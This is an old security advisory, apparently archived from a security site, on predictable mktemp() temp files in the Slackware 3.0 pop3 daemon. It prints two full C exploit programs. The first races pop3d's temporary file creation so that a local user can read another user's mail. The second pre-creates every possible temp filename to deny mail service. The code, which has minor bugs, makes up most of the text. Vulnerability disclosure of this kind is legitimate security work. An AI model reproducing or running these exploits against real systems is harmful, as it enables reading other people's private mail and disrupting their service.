As explained before in the mailx security post, there is a problem with
usage of mktemp() in many programs. This is a follow-up to that, demonstrating
the generic denial of service attack and a race condition attack on linux's
Slackware 3.0 pop3 mail daemon. Refer to the original mailx post for
information on the security concerns with the use of mktemp().
Linux's /usr/sbin/in.pop3d contains a mktemp() race condition, exploitable
when pop client connects to the machine at the point a correct password for
a user is entered. This allows you to read the contents of the mail spool of
a user when they connect with a pop client.
Program: pop3d (/usr/sbin/in.pop3d)
Affected Operating Systems: linux - Slackware 3.0 with pop3d enabled
Requirements: account on system, target user uses pop client
Temporary Patch: disable pop3d
Security Compromise: any user with an account can read mail of a user
using a pop client to read mail.
Author: Dave M. (davem@cmu.edu)
Synopsis: The predictability of mktemp() is exploited to
create the temporary files after the filenames
have been determined but before they are actually
created, allowing the mail being dumped to those
temporary files to be read by the creator of the
files.
pop3d-exploit.c:
/* This program creates temporary files used by in.pop3d (/usr/sbin/in.pop3d
under Slackware 3.0), which can then be read by the program.
This race condition is NOT always successful, it may take extreme conditions
to ensure a high probability of success.
Dave M. (davem@cmu.edu)
*/
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
main(int argc, char **argv)
{
int race;
int i;
char fname[80], tmpf[80]; /* hold filename */
umask(0);
if(argc<1)
{
printf("pop3 racer\nSyntax: %s process-id\n",argv[0]);
return -1;
}
/* create tmp file to race creating */
strcpy(tmpf,"/tmp/pop3");
for(i=strlen(argv[1]);i<6;i++)
strcat(tmpf,"0");
strcat(tmpf,argv[1]);
tmpf[9] = 'a';
race = creat(tmpf,S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);
while(1)
{
rename(tmpf,"/tmp/pop.exploit");
if(rename("/tmp/pop.exploit",tmpf) < 0)
{
printf("race lost - file created.\n"); /* catch 1/2 the losses */
break;
}
}
}
Program: Any with termination on mktemp() failure
Affected Operating Systems: Any with predictable mktemp() return values
Requirements: write access to directory temp files written to
Security Compromise: denial of service
Author: Dave M. (davem@cmu.edu)
Synopsis: Many operating systems have an extremely limited
temporary file creation algorithm, which results
in denial of service attacks on any program that
uses them exceedingly easy.
deny-mktemp.c:
/* This programs opens the complete set of temporary files tested with mktemp()
for a given template (with 6 X's), usually resulting in the program
terminating upon failure to find an open file. In pop3d, this prevents a
pop client from reading their mail.
Dave M. (davem@cmu.edu)
*/
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
/* template found in program's header file, minus X's */
#define TEMPLATE "/tmp/pop3"
main(int argc, char **argv)
{
long int i,j;
char fname[20];
if(argc<2)
{
printf("Syntax: %s process-id\n");
return -1;
}
j = strlen(TEMPLATE);
strcpy(fname,TEMPLATE);
for(i=strlen(argv[1]);i<6;i++)
strcat(fname,"0");
strcat(fname,argv[1]);
for(i=0;i<26;i++)
{
fname[j] = 'a' + i;
creat(fname,O_WRONLY | O_CREAT);
}
for(i=0;i<26;i++)
{
fname[j] = 'A' + i;
creat(fname,O_WRONLY | O_CREAT);
}
for(i=0;i<9;i++)
{
fname[j] = '0' + i;
creat(fname,O_WRONLY | O_CREAT);
}
}
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
